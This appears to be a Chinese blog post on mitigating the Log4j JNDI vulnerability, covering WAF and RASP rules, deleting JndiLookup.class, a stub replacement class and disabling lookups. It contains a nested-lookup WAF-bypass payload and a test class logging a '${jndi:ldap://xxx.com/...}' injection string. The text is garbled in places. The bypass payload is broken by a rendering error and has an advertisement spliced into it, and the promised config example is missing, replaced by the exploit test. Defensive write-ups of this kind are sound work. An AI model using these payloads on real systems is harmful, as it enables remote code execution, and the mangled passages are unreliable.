缓解方式1:接入安全产品
============
第一时间上WAF规则、RASP拦截等措施,给修复争取时间。
但是也要注意一些静态规则上的绕过,log4j 支持的写法比较多,有非常多绕过姿势。比如:
KaTeX parse error: Expected '}', got 'EOF' at end of input: {{lower:j} u p p e r : n {upper:n} upper:n{lower:d} u p p e r : i : {upper:i}: upper:i:{lower:r}m${lower:i}} 《一线大厂Java面试题解析+后端开发学习笔记+最新架构讲解视频+实战项目源码讲义》无偿开源 威信搜索公众号【编程进阶路】 /xxxxxxx.xx/poc}
缓解方式2:删除漏洞类
===========
通过删除漏洞类进行修复的方案比较稳,也是官方推荐的一种修复方案。直接删除 log4j jar 包中存在漏洞的类:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
这种修复比较方便快捷,一般业务代码也不会用到 jndi lookup 这个功能。不过可能会对基于版本号判定的安全数据采集造成一定困扰,无法准确统计漏洞的最新受影响情况。建议删除之后在 jar 包后面加上一定的标记,如: log4j-2.14.1.sec.jar
另外,由于某些原因不想删除的话,可以自己代码替换原始的 JndiLookup 类,将它加到业务代码中。需要注意的是,必须保证它在 log4j 原类之前加载。
package org.apache.logging.log4j.core.lookup;
public class JndiLookup {
public JndiLookup() {
throw new NoClassDefFoundError(“JNDI lookup is disabled”);
}
}
也可以做成依赖包,在 log4j-core 之前添加,可以实现同样的效果(注意不要引入不可信的第三方依赖,可能导致潜在安全风险,以下配置来源互联网,仅作为示例,请勿直接使用):
org.glavo
log4j-patch
1.0
当然也可以通过RASP的方式干掉漏洞类,Github上有不少RASP的无损修复方案,比如:
https://github.com/chaitin/log4j2-vaccine
https://github.com/boundaryx/cloudrasp-log4j2
缓解方式3:通过配置禁用 log4j 的 lookup 功能
==============================
禁用的方式就比较多了。然而下面2、3、4这几种方式对低于 2.10 版本的 log4j-core 都没有效果,而且环境变量和启动参数这种设置,在迁移或者变更的过程中丢失的可能性比较大。log4j 在 2.15.0 版本中默认就已经关闭了 lookup 功能。
log4j2.component.properties、log4j2.xml 默认放在 ClassPath 路径下,如:源代码的资源目录或者可执行程序所在的当前目录。
1. 设置日志输出 Pattern 格式
=====================
对于 >=2.7 的版本,在 log4j 中对每一个日志输出格式进行修改。在 %msg 占位符后面添加 {nolookups},这种方式的适用范围比其他三种配置更广。比如在 log4j2.xml 中配置:
public class Test {
public static void main(String[] args) {
String t = “${jndi:ldap://xxx.com/xxx}”;
Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
logger.error(t);
}
}